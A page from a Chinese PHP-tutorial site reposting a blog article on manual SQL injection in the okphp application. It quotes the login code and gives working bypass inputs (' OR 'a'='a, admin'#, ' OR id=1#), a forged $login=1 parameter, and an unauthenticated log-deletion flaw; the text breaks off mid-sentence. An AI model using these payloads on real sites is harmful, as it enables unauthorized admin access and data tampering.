当前位置: 首页 > 图文教程 > 网络编程 > PHP > 手工注射php学习

PHP
PHP 开发环境的选择、建立及使用(5)
PHP 开发环境的选择、建立及使用(6)
PHP 开发环境的选择、建立及使用(7)
PHP 开发环境的选择、建立及使用(8)
PHP 开发环境的选择、建立及使用(9)
Win2003下APACHE PHP5 MYSQL4 PHPMYADMIN 的简易安装配置
PHP新手上路(八) 文件上传
PHP新手上路(九) 投票系统
PHP新手上路(十) 简易banner动态更替
PHP新手上路(十一) 数据库链接
PHP新手上路(十二)使用PHP来操作Oracle数据库
PHP新手上路(十三)PHP资源
PHP新手上路(十四) 其他杂项
session全教程(一)
session全教程(二)
session全教程(三)
PHP编码规范
第十五节--Zend引擎的发展 -- Classes and Objects in PHP5 [15]
第十四节--命名空间 -- Classes and Objects in PHP5 [14]
第十二节--类的自动加载 -- Classes and Objects in PHP5 [12]

PHP 中的 手工注射php学习


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 91 ::
收藏到网摘: n/a

转自:http://www6.blog.163.com/article/-2jc4-x8C13g.html

代码: 
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname); 
$password = md5($password); 
$q = "select id,group_id from $user_table where username='$username' and password='$password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中 
$username 和 $password 没过滤, 很容易就绕过。 
对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有: 

构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a 

相当于sql语句: 
select * from $user_table where username= OR 'a'='a' and password= OR 'a'='a' 

构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*) 

即: 
select * from $user_table where username='admin'#' and password='$password'" 

相当于: 
select * from $user_table where username='admin' 

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2: 

select id,group_id from $user_table where username='admin'#' and password='$password'" 

相当于: 
select id,group_id from $user_table where username='admin' 

只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id, 
我们就可以这样构造:$username=' OR id=1# 

相当于: 
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉) 

我们接着往下看代码: 
if ($row[0]) { 
// If not admin or super moderator 
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { 
$login = 0; 


else { 
$login = 1; 


// Fail to login
--- 
if (!$login) { 
write_log("Moderator login","0","password wrong"); 
echo "<script>alert('login failed!');history.go(-1);</script>"; 
exit(); 

// Access ! 

else { 
session_start(); 

呵呵~~ 最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。 


2.users/login.php注射导致绕过身份验证漏洞: 
代码: 
$md5password = md5($password); 
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$username没过滤利用同1里注释掉and password='$md5password'";就绕过啦。 


3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下) 

okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码: 

$arr = array("del_log","log_id","del_id"); 
get_r($arr); 
// 
if ($del_log) { 
省略........ 
if ($log_id) { 
foreach ($log_id as $val) { 
$q = "delete from $log_table where id='$val'"; 
$res = sql_query($q,$conn); 
if ($res) { 
$i++; 



elseif ($del_id) { 
$q = "delete from $log_table where id='$del_id'"; 
$res = sql_query($q,$conn); 

$tpl->setVariable("message","$i log deleted ok!"); 
$tpl->setVariable("action","index.php?action=list_log"); 


代码就只简单的用get_r($arr);判断的提交的参数,我